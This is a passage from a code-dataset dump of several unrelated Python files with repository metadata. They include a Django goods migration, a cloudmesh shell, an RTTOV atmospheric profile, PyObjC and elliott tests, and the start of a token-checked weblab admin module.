loop.run_until_complete(asyncio.gather(save_new_blocks(w3), backfill(w3)))
finally:
loop.close()
| [
"[email protected]"
]
| |
ade677f8e988685507a1c948ac73be652ce39b49 | f0d3b759d9b0d2000cea2c291a4974e157651216 | /apps/goods/migrations/0001_initial.py | 303ea309f8cf6f7ee582bdc2901bd642b7490841 | []
| no_license | PYBPYB/Fresh-every-day | 526265ae0a9b1fe8e8f8944e0320ea8a47b8571c | 5b62fda9effe327a5da9ce45644bf44ee9d7108f | refs/heads/master | 2020-04-12T14:39:31.325736 | 2019-05-31T02:31:54 | 2019-05-31T02:31:54 | 162,558,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,310 | py | # Generated by Django 2.1.3 on 2018-11-26 09:10
from django.db import migrations, models
import django.db.models.deletion
import tinymce.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Goods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='商品SPU名称')),
('detail', tinymce.models.HTMLField(blank=True, verbose_name='商品详情')),
],
options={
'verbose_name': '商品SPU',
'verbose_name_plural': '商品SPU',
'db_table': 'df_goods',
},
),
migrations.CreateModel(
name='GoodsImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('image', models.ImageField(upload_to='goods', verbose_name='图片路径')),
],
options={
'verbose_name': '商品图片',
'verbose_name_plural': '商品图片',
'db_table': 'df_goods_image',
},
),
migrations.CreateModel(
name='GoodsSKU',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='商品名称')),
('desc', models.CharField(max_length=250, verbose_name='商品简介')),
('price', models.DecimalField(decimal_places=2, max_digits=10, verbose_name='商品价格')),
('unite', models.CharField(max_length=20, verbose_name='商品单位')),
('image', models.ImageField(upload_to='goods', verbose_name='商品图片')),
('stock', models.IntegerField(default=1, verbose_name='商品库存')),
('sales', models.IntegerField(default=0, verbose_name='商品销量')),
('status', models.SmallIntegerField(choices=[(0, '下架'), (1, '上架')], default=1, verbose_name='是否上架')),
('goods', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.Goods', verbose_name='商品SPU')),
],
options={
'verbose_name': '商品',
'verbose_name_plural': '商品',
'db_table': 'df_goods_sku',
},
),
migrations.CreateModel(
name='GoodsType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='种类名称')),
('logo', models.CharField(max_length=20, verbose_name='标识')),
('image', models.ImageField(upload_to='type', verbose_name='商品类型图片')),
],
options={
'verbose_name': '商品种类',
'verbose_name_plural': '商品种类',
'db_table': 'df_goods_type',
},
),
migrations.CreateModel(
name='IndexGoodsBanner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('image', models.ImageField(upload_to='banner', verbose_name='图片')),
('index', models.SmallIntegerField(default=0, verbose_name='展示顺序')),
('sku', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsSKU', verbose_name='商品')),
],
options={
'verbose_name': '首页轮播商品',
'verbose_name_plural': '首页轮播商品',
'db_table': 'df_index_banner',
},
),
migrations.CreateModel(
name='IndexPromotionBanner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='活动名称')),
('url', models.URLField(verbose_name='活动链接')),
('image', models.ImageField(upload_to='banner', verbose_name='活动图片')),
('index', models.SmallIntegerField(default=0, verbose_name='展示顺序')),
],
options={
'verbose_name': '主页促销活动',
'verbose_name_plural': '主页促销活动',
'db_table': 'df_index_promotion',
},
),
migrations.CreateModel(
name='IndexTypeBanner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('display_type', models.SmallIntegerField(choices=[(0, '不展示'), (1, '展示')], default=1, verbose_name='展示表示')),
('index', models.SmallIntegerField(default=0, verbose_name='展示顺序')),
('sku', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsSKU', verbose_name='商品SKU')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsType', verbose_name='商品类型')),
],
options={
'verbose_name': '主页分类展示商品',
'verbose_name_plural': '主页分类展示商品',
'db_table': 'df_index_type_goods',
},
),
migrations.AddField(
model_name='goodssku',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsType', verbose_name='商品种类'),
),
migrations.AddField(
model_name='goodsimage',
name='sku',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsSKU', verbose_name='商品'),
),
]
| [
"[email protected]"
]
| |
17886f2c49f51a24b121c87812d0111097c21985 | f47755f746c316cfdac8afaefe6d149aa77bc4e5 | /cloudmesh/rest/shell/shell.py | 052d890a4c3d2c4cb6cea1c4671b1c59ab97593b | [
"Apache-2.0"
]
| permissive | karthik-anba/rest | a3705b9349ebf7e6e1b4f21036301529adfd3dc8 | b575a5bc16a5352f87c107fadb435935d5b66746 | refs/heads/master | 2021-01-21T10:46:23.433663 | 2017-02-23T01:20:23 | 2017-02-23T01:20:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,358 | py | #
# in our rest architecture we want to interface to the backend systems while
# using a secure rest service. I
# Internally we will use the many fnctions that cloudmesh_client provides.
# Before we use them we need to implement some elementary functions
# lets first do administrative functions in an admin commond
# pseudo code: task implement
from __future__ import print_function
import importlib
import pkgutil
import pydoc
import sys
import textwrap
from cmd import Cmd
from cloudmesh_client.shell.command import PluginCommand
from cloudmesh_client.shell.command import command
import cloudmesh
from cloudmesh.rest.server. mongo import Mongo
import inspect
from cloudmesh_client.common.dotdict import dotdict
def print_list(elements):
for name in elements:
print("*", name)
class plugin(object):
@classmethod
def modules(cls):
module_list = []
package = cloudmesh
for importer, modname, ispkg in pkgutil.walk_packages(path=package.__path__,
prefix=package.__name__ + '.',
onerror=lambda x: None):
module_list.append(modname)
return module_list
@classmethod
def classes(cls):
module_list = cls.modules()
commands = []
for module in module_list:
if module.startswith('cloudmesh.ext.command.'):
commands.append(module)
return commands
@classmethod
def name(cls, command):
command_name = "do_" + command
class_name = "cloudmesh.ext.command." + command + "." \
+ command.capitalize() + "Command"
return class_name, command_name
@classmethod
def class_name(cls, command):
return "cloudmesh.ext.command." + command + "." \
+ command.capitalize() + "Command"
@classmethod
def load(cls, commands=None):
"""
:param commands: If None the commands will be found from import cloudmesh
Otherwise the commands can be explicitly specified with
commands = [
'cloudmesh.ext.command.bar.BarCommand',
'cloudmesh.ext.command.foo.FooCommand',
]
A namespace packege must exists. Foo and Bar ar just examples
:return: the classes of the command
"""
if commands is None:
commands = [c.split('.')[-1] for c in cls.classes()]
# print_list(commands)
COMMANDS = [cls.class_name(c) for c in commands]
commands = [getattr(importlib.import_module(mod), cls) for (mod, cls) in
(commands.rsplit(".", 1) for commands in COMMANDS)]
return commands
plugin.load()
PluginCommandClasses = type(
'CommandProxyClass',
tuple(PluginCommand.__subclasses__()),
{})
class CMShell(Cmd, PluginCommandClasses):
prompt = 'cms> '
banner = textwrap.dedent("""
+=======================================================+
. ____ _ _ _ .
. / ___| | ___ _ _ __| |_ __ ___ ___ ___| |__ .
. | | | |/ _ \| | | |/ _` | '_ ` _ \ / _ \/ __| '_ \ .
. | |___| | (_) | |_| | (_| | | | | | | __/\__ \ | | | .
. \____|_|\___/ \__,_|\__,_|_| |_| |_|\___||___/_| |_| .
+=======================================================+
Cloudmesh Rest Shell
""")
#
# List all commands that start with do
#
@command
def do_help(self, args, arguments):
"""
::
Usage:
help
Description:
help - List of all registered commands
"""
print("Help")
print("====")
methodList = [n for n, v in inspect.getmembers(self, inspect.ismethod)]
functionList = [n for n, v in inspect.getmembers(self, inspect.isfunction)]
commands = methodList + functionList
for c in sorted(commands):
if c.startswith("do_"):
print(c.replace("do_", ""), end=' ')
print ()
return ""
@command
def do_info(self, args, arguments):
"""
::
Usage:
info [commands|package|help]
Description:
info
provides internal info about the shell and its packages
"""
arguments = dotdict(arguments)
module_list = plugin.modules()
if arguments.commands:
commands = plugin.classes()
print_list(commands)
elif arguments.help:
for name in module_list:
p = "cloudmesh." + name
strhelp = p + " not found."
try:
strhelp = pydoc.render_doc(p, "Help on %s" + "\n" + 79 * "=")
except Exception, e:
pass
print(strhelp)
else:
print_list(module_list)
@command
def do_admin(self, args, arguments):
"""
::
Usage:
admin [db|rest] start
admin [db|rest] stop
admin db backup
admin db reset
admin status
Description:
db start
starts the database service
db stop
stops the database service
db backup
creates abackup of the database
db reset
resets the database
Arguments:
FILE a file name
Options:
-f specify the file
"""
arguments = dotdict(arguments)
print(arguments)
if arguments.db and arguments.stop:
print("PLEASE stop db")
m = Mongo()
m.stop()
elif arguments.db and arguments.start:
print("PLEASE start db")
m = Mongo()
m.start()
elif arguments.rest and arguments.start:
print("PLEASE start rest")
# m = Eve()
# m.start()
elif arguments.rest and arguments.stop:
print("PLEASE stop rest")
# m = Eve()
# m.stop()
elif arguments.start:
m = Mongo()
r = m.start()
print(r)
# start mong, start eve
pass
elif arguments.stop:
m = Mongo()
r = m.stop()
print(r)
# stop eve
pass
elif arguments.status:
m = Mongo()
r = m.status()
print(r)
def preloop(self):
"""adds the banner to the preloop"""
lines = textwrap.dedent(self.banner).split("\n")
for line in lines:
# Console.cprint("BLUE", "", line)
print(line)
# noinspection PyUnusedLocal
def do_EOF(self, args):
"""
::
Usage:
EOF
Description:
Command to the shell to terminate reading a script.
"""
return True
# noinspection PyUnusedLocal
def do_quit(self, args):
"""
::
Usage:
quit
Description:
Action to be performed whne quit is typed
"""
return True
do_q = do_quit
def emptyline(self):
return
#def main():
# CMShell().cmdloop()
def inheritors(klass):
subclasses = set()
work = [klass]
while work:
parent = work.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
work.append(child)
return subclasses
def do_gregor(line):
print("gregor")
# noinspection PyBroadException
def main():
"""cms.
Usage:
cms --help
cms [--echo] [--debug] [--nosplash] [-i] [COMMAND ...]
Arguments:
COMMAND A command to be executed
Options:
--file=SCRIPT -f SCRIPT Executes the script
-i After start keep the shell interactive,
otherwise quit [default: False]
--nosplash do not show the banner [default: False]
"""
def manual():
print(main.__doc__)
args = sys.argv[1:]
arguments = {
'--echo': '--echo' in args,
'--help': '--help' in args,
'--debug': '--debug' in args,
'--nosplash': '--nosplash' in args,
'-i': '-i' in args}
echo = arguments["--echo"]
if arguments['--help']:
manual()
sys.exit()
for a in args:
if a in arguments:
args.remove(a)
arguments['COMMAND'] = [' '.join(args)]
commands = arguments["COMMAND"]
if len(commands) > 0:
if ".cm" in commands[0]:
arguments["SCRIPT"] = commands[0]
commands = commands[1:]
else:
arguments["SCRIPT"] = None
arguments["COMMAND"] = ' '.join(commands)
if arguments["COMMAND"] == '':
arguments["COMMAND"] = None
# noinspection PySimplifyBooleanCheck
if arguments['COMMAND'] == []:
arguments['COMMAND'] = None
splash = not arguments['--nosplash']
debug = arguments['--debug']
interactive = arguments['-i']
script = arguments["SCRIPT"]
command = arguments["COMMAND"]
#context = CloudmeshContext(
# interactive=interactive,
# debug=debug,
# echo=echo,
# splash=splash)
cmd = CMShell()
# if script is not None:
# cmd.do_exec(script)
try:
if echo:
print(cmd.prompt, command)
if command is not None:
cmd.precmd(command)
stop = cmd.onecmd(command)
cmd.postcmd(stop, command)
except Exception as e:
print("ERROR: executing command '{0}'".format(command))
print(70 * "=")
print(e)
print(70 * "=")
if interactive or (command is None and script is None):
cmd.cmdloop()
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
e3656c3a8b753864e8154ec4f8a46ac7e789e3b0 | 9decd5901a491d08e9235abc7fb8dade362d215e | /pastepwn/database/__init__.py | d67e426275658725e14ea82b809b9e95828cb0b9 | [
"MIT"
]
| permissive | jonahrosenblum/pastepwn | b4e7644fefd289d8ffb2a1cc6e77224dd1545c46 | 26c9e426a195d403894f00638eca6c5687cbd959 | refs/heads/master | 2021-01-02T22:03:26.922322 | 2020-02-04T23:36:08 | 2020-02-04T23:36:08 | 239,809,524 | 0 | 0 | MIT | 2020-02-11T16:27:06 | 2020-02-11T16:27:05 | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
from .abstractdb import AbstractDB
from .mongodb import MongoDB
from .mysqldb import MysqlDB
from .sqlitedb import SQLiteDB
__all__ = ('AbstractDB', 'MongoDB', 'SQLiteDB', 'MysqlDB')
| [
"[email protected]"
]
| |
be0d795ee4a482be60cebd7782452cdb1ec3243e | 5593b35f326748f18053e7ea042c98fe6b70a850 | /tqt/function/_utils.py | fcfe437056c27c6c9f5efbfe6e9d8517486bdff4 | [
"BSD-3-Clause"
]
| permissive | sicdl/TQT | 7dfe3bce2bb5dace9a467945512e65525a0c3be9 | 27b73fcf27ddfb67cd28f6ed27e49341f27c9f16 | refs/heads/main | 2023-04-14T18:28:23.224689 | 2021-04-22T14:46:46 | 2021-04-22T14:46:46 | 362,503,682 | 0 | 0 | BSD-3-Clause | 2021-04-28T14:45:14 | 2021-04-28T14:45:13 | null | UTF-8 | Python | false | false | 153 | py | import torch
def number_to_tensor(x, t):
r'''
Turn x in to a tensor with data type like tensor t.
'''
return torch.tensor(x).type_as(t) | [
"[email protected]"
]
| |
f7322bfe24f366e1da7e22987d6cb7ed70e9b213 | 2031771d8c226806a0b35c3579af990dd0747e64 | /pyobjc-framework-SecurityInterface/PyObjCTest/test_sfchooseidentitypanel.py | 128a8fe463da4b1756ea2b16a7730993712ab6e7 | [
"MIT"
]
| permissive | GreatFruitOmsk/pyobjc-mirror | a146b5363a5e39181f09761087fd854127c07c86 | 4f4cf0e4416ea67240633077e5665f5ed9724140 | refs/heads/master | 2018-12-22T12:38:52.382389 | 2018-11-12T09:54:18 | 2018-11-12T09:54:18 | 109,211,701 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from PyObjCTools.TestSupport import *
import SecurityInterface
class TestSFChooseIdentityPanelHelper (SecurityInterface.NSObject):
def chooseIdentityPanelShowHelp_(self, v): return 1
class TestSFChooseIdentityPanel (TestCase):
    # Smoke test: the class must be exported by the SecurityInterface bindings.
    def test_classes(self):
        SecurityInterface.SFChooseIdentityPanel

    # Check the bridged method signatures: selector argument, BOOL arguments
    # and BOOL results must be annotated correctly in the metadata.
    def test_methods(self):
        self.assertArgIsSEL(SecurityInterface.SFChooseIdentityPanel.beginSheetForWindow_modalDelegate_didEndSelector_contextInfo_identities_message_, 2, b'v@:@'+objc._C_NSInteger+b'^v')
        self.assertArgIsBOOL(SecurityInterface.SFChooseIdentityPanel.setShowsHelp_, 0)
        self.assertResultIsBOOL(SecurityInterface.SFChooseIdentityPanel.showsHelp)
        self.assertResultIsBOOL(TestSFChooseIdentityPanelHelper.chooseIdentityPanelShowHelp_)
if __name__ == "__main__":
    main()
| [
"[email protected]"
]
| |
d3159cc0e9ff7137a95d0711e6f9b502070a0fda | 0667af1539008f9c6c0dcde2d3f50e8bbccf97f3 | /source/rttov_test/profile-datasets-py/div52_zen50deg/036.py | a78064452fb7611b980d7bf251e9df26e12cb8da | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | bucricket/projectMAScorrection | bc6b90f07c34bf3e922225b2c7bd680955f901ed | 89489026c8e247ec7c364e537798e766331fe569 | refs/heads/master | 2021-01-22T03:54:21.557485 | 2019-03-10T01:47:32 | 2019-03-10T01:47:32 | 81,468,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,625 | py | """
Profile ../profile-datasets-py/div52_zen50deg/036.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div52_zen50deg/036.py"
self["Q"] = numpy.array([ 1.60776800e+00, 4.99817300e+00, 4.07414300e+00,
6.67667600e+00, 8.13295200e+00, 7.49870800e+00,
4.95508500e+00, 7.24563000e+00, 5.96519400e+00,
4.81720300e+00, 5.67166500e+00, 5.44611200e+00,
5.89519200e+00, 3.89188700e+00, 4.59972100e+00,
4.77842400e+00, 4.27284700e+00, 4.33680400e+00,
4.22628600e+00, 3.86177400e+00, 4.34807400e+00,
4.12327700e+00, 3.82283400e+00, 4.05055800e+00,
4.04113600e+00, 3.89531200e+00, 4.07803400e+00,
4.26075700e+00, 3.93224200e+00, 3.64382500e+00,
3.69615800e+00, 3.74678700e+00, 3.58848600e+00,
3.42693800e+00, 3.36090700e+00, 3.33667800e+00,
3.40327200e+00, 3.65646200e+00, 3.90278800e+00,
3.68729900e+00, 3.43068400e+00, 3.27563100e+00,
3.23161100e+00, 3.23582300e+00, 5.48813900e+00,
7.68749100e+00, 1.12740300e+01, 1.58383200e+01,
1.87049700e+01, 1.11524200e+01, 3.76257500e+00,
3.06379300e+01, 7.11222300e+01, 8.68246900e+01,
4.55990700e+01, 5.19350000e+00, 1.12110900e+02,
2.31250900e+02, 2.15328600e+02, 9.40471000e+01,
2.87742000e+00, 7.10424400e+00, 1.12544100e+01,
2.41607900e+02, 4.85529300e+02, 1.16292500e+03,
2.05753200e+03, 2.78321900e+03, 3.28114300e+03,
3.78251900e+03, 4.31976100e+03, 4.85350100e+03,
5.47782800e+03, 6.09185800e+03, 6.74157700e+03,
7.38341400e+03, 8.12011400e+03, 8.85724900e+03,
9.79029700e+03, 1.07286700e+04, 1.20882700e+04,
1.35251300e+04, 1.54343700e+04, 1.68775400e+04,
1.76879400e+04, 1.85843900e+04, 1.95199900e+04,
2.05302800e+04, 2.16585600e+04, 2.29002800e+04,
2.42792600e+04, 2.57725100e+04, 2.74135100e+04,
2.90645600e+04, 3.04254300e+04, 3.19978400e+04,
3.40990700e+04, 3.55844500e+04, 3.46182900e+04,
3.36907600e+04, 3.27995700e+04])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56504000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61259000e+01, 6.09895000e+01, 6.61252000e+01,
7.15398000e+01, 7.72395000e+01, 8.32310000e+01,
8.95203000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17777000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23441000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90892000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53627000e+02, 7.77789000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31523000e+02, 9.58591000e+02,
9.86066000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 341.2305, 341.2293, 341.2296, 341.2287, 341.2282, 341.2284,
341.2293, 341.2285, 341.229 , 341.2294, 341.2291, 341.2291,
341.229 , 341.2297, 341.2294, 341.2294, 341.2295, 341.2295,
341.2296, 341.2297, 341.2295, 341.2296, 341.2297, 341.2296,
341.2296, 341.2297, 341.2296, 341.2295, 341.2297, 341.2298,
341.2297, 341.8187, 342.4488, 343.1208, 343.8348, 344.5929,
345.3958, 346.2457, 347.1426, 348.0887, 349.0838, 350.1309,
351.2299, 351.2299, 351.2291, 351.2283, 351.227 , 351.2254,
351.2244, 351.2271, 351.2297, 351.2202, 351.206 , 351.2005,
351.215 , 351.2292, 351.1916, 351.1498, 351.1554, 351.198 ,
351.23 , 351.2285, 351.227 , 351.1461, 351.0605, 350.8225,
350.5083, 350.2534, 350.0786, 349.9025, 349.7138, 349.5263,
349.307 , 349.0914, 348.8631, 348.6377, 348.379 , 348.1201,
347.7923, 347.4628, 346.9852, 346.4806, 345.81 , 345.3031,
345.0184, 344.7036, 344.375 , 344.0201, 343.6238, 343.1877,
342.7034, 342.1789, 341.6025, 341.0226, 340.5446, 339.9924,
339.2543, 338.7326, 339.072 , 339.3978, 339.7108])
self["T"] = numpy.array([ 172.975, 188.884, 204.715, 216.336, 228.403, 234.187,
241.954, 252.632, 263.577, 265.794, 263.43 , 259.566,
253.694, 249.53 , 247.304, 243.998, 242.007, 241.244,
238.968, 234.894, 232.906, 229.919, 226.865, 224.546,
223.304, 222.7 , 223.263, 223.76 , 221.243, 218.834,
216.745, 214.724, 212.733, 210.802, 209.159, 207.665,
206.16 , 204.582, 203.048, 200.011, 196.896, 194.45 ,
192.73 , 191.145, 193.967, 196.723, 199.161, 201.357,
203.588, 206.319, 208.992, 211.874, 214.808, 217.411,
219.322, 221.195, 223.676, 226.172, 230.264, 235.587,
239.854, 240.822, 241.772, 243.613, 245.492, 247.817,
250.353, 252.693, 254.779, 256.778, 258.546, 260.285,
261.97 , 263.628, 265.182, 266.706, 268.272, 269.821,
271.562, 273.297, 275.39 , 277.511, 279.901, 281.829,
283.132, 284.507, 285.898, 287.291, 288.692, 290.073,
291.423, 292.803, 294.252, 295.567, 296.707, 297.862,
299.18 , 300.86 , 300.86 , 300.86 , 300.86 ])
self["O3"] = numpy.array([ 5.01755700e-02, 1.15813100e-01, 2.47679900e-01,
4.75340700e-01, 9.45566100e-01, 1.46851900e+00,
1.87795000e+00, 2.17465400e+00, 2.43277600e+00,
2.92066800e+00, 3.57626700e+00, 4.40444000e+00,
5.45986700e+00, 6.33738900e+00, 7.10775900e+00,
7.82629700e+00, 8.43338300e+00, 8.94155800e+00,
9.35094900e+00, 9.64592600e+00, 9.70494000e+00,
9.62606900e+00, 9.43127400e+00, 9.00999400e+00,
8.35107300e+00, 7.56506600e+00, 6.81864500e+00,
6.09690800e+00, 5.33800900e+00, 4.59311800e+00,
3.73551900e+00, 2.90568800e+00, 2.18988100e+00,
1.49945100e+00, 1.05707600e+00, 7.27611500e-01,
4.60667100e-01, 3.12258400e-01, 1.67879100e-01,
1.23013600e-01, 8.91367700e-02, 7.08934100e-02,
6.97595400e-02, 6.86654900e-02, 6.81548200e-02,
6.76556200e-02, 6.54202300e-02, 6.19483600e-02,
5.86753800e-02, 5.62659800e-02, 5.39084300e-02,
5.14477100e-02, 4.89749200e-02, 4.62010700e-02,
4.26514900e-02, 3.91723600e-02, 3.73109700e-02,
3.56372300e-02, 3.45162900e-02, 3.38305000e-02,
3.31925400e-02, 3.26846700e-02, 3.21860900e-02,
3.17491200e-02, 3.13242300e-02, 3.09235200e-02,
3.05388900e-02, 3.01843900e-02, 2.98684600e-02,
2.95764800e-02, 2.93577500e-02, 2.91488800e-02,
2.90530000e-02, 2.89587700e-02, 2.90996900e-02,
2.92517800e-02, 2.96474400e-02, 3.00649500e-02,
3.06183500e-02, 3.11761600e-02, 3.16856500e-02,
3.21589500e-02, 3.24871200e-02, 3.27531600e-02,
3.29365300e-02, 3.29429600e-02, 3.28500800e-02,
3.25754900e-02, 3.20801900e-02, 3.13033800e-02,
3.01042200e-02, 2.82785300e-02, 2.58376700e-02,
2.26970500e-02, 1.84285000e-02, 1.32521800e-02,
7.32499400e-03, 3.38092700e-03, 3.38431400e-03,
3.38756600e-03, 3.39069000e-03])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 300.86
self["S2M"]["Q"] = 35766.26576
self["S2M"]["O"] = 0.00338028981898
self["S2M"]["P"] = 1008.79
self["S2M"]["U"] = -2.07465
self["S2M"]["V"] = -6.63631
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 1
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 302.671
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 50.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = -8.40953
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([1993, 5, 1])
self["TIME"] = numpy.array([12, 0, 0])
| [
"[email protected]"
]
| |
307afce7174d1f60914d4a08060660c34b82e628 | 794be26e4ab7bdd9af017ce1d0c6ce1f087d968d | /functional_tests/test_create.py | b0b5e0c8678060723a0834273615afdbe0ad3866 | [
"Apache-2.0",
"LGPL-3.0-only"
]
| permissive | jasinner/elliott | 02fcc2f67b56d4e16eef28f0323d276fbd954593 | 67d77913517d0f7954dc02d918eb96ba78ec1ea8 | refs/heads/master | 2021-06-18T19:59:45.878716 | 2021-04-29T21:33:51 | 2021-04-29T21:33:51 | 215,217,286 | 0 | 0 | Apache-2.0 | 2019-10-15T05:52:13 | 2019-10-15T05:52:13 | null | UTF-8 | Python | false | false | 662 | py | from __future__ import absolute_import, print_function, unicode_literals
import unittest
import subprocess
from functional_tests import constants
class GreateTestCase(unittest.TestCase):
    """Functional test for ``elliott create`` without ``--yes``: the command
    should only report the advisory it would create."""

    def test_create_rhba(self):
        # Arguments describing the RHBA advisory to (dry-run) create.
        creation_args = [
            "--group=openshift-4.2", "create", "--type=RHBA", "--impetus=standard", "--kind=rpm",
            "--date=2020-Jan-1", "[email protected]", "[email protected]", "[email protected]"
        ]
        command = constants.ELLIOTT_CMD + creation_args
        output = subprocess.check_output(command)
        self.assertIn("Would have created advisory:", output.decode("utf-8"))
| [
"[email protected]"
]
| |
38f612204aaf7a5bb92d2ddfc8514649d07bdcad | a73cc710aa370be94b70248f2268d9c3b14059d0 | /server/src/weblab/core/web/quickadmin.py | 1fba2f6ba62d2380539e03e37e0669230626b289 | [
"BSD-3-Clause",
"BSD-2-Clause"
]
| permissive | weblabdeusto/weblabdeusto | 05692d4cc0a36287191544551d4a1113b3d95164 | 62e488afac04242a68efa4eb09fd91d7e999d4dd | refs/heads/master | 2023-05-10T23:14:05.407266 | 2022-08-31T14:16:23 | 2022-08-31T14:16:23 | 5,719,299 | 19 | 23 | BSD-2-Clause | 2023-05-01T20:18:53 | 2012-09-07T16:24:03 | Python | UTF-8 | Python | false | false | 7,417 | py | from __future__ import print_function, unicode_literals
import datetime
import calendar
from flask import render_template, request, send_file, Response, url_for
from functools import wraps, partial
from weblab.core.web import weblab_api
from weblab.core.db import UsesQueryParams
def check_credentials(func):
    """View decorator enforcing the shared ``quickadmin_token`` secret.

    If the ``quickadmin_token`` configuration option is set, the request must
    carry a matching ``?token=...`` query argument; otherwise access is
    denied.  When the option is unset the view stays unprotected (original
    behaviour, kept for backward compatibility).
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        expected_token = weblab_api.config.get('quickadmin_token', None)
        if expected_token:
            token = request.args.get('token')
            if not token:
                # Bug fix: authentication failures previously came back as
                # HTTP 200; return 401 so clients can detect missing auth.
                return Response("You must provide a token like ?token=something", status=401)
            if token != expected_token:
                # NOTE(review): hmac.compare_digest would make this check
                # constant-time; consider it if the token is high-value.
                # 403: a token was supplied but it is wrong.
                return Response("Invalid token", status=403)
        return func(*args, **kwargs)
    return wrapper
def get_url_for():
    """Return a ``url_for``-like callable that carries the current request's
    query arguments forward (except ``page``, which each link sets itself,
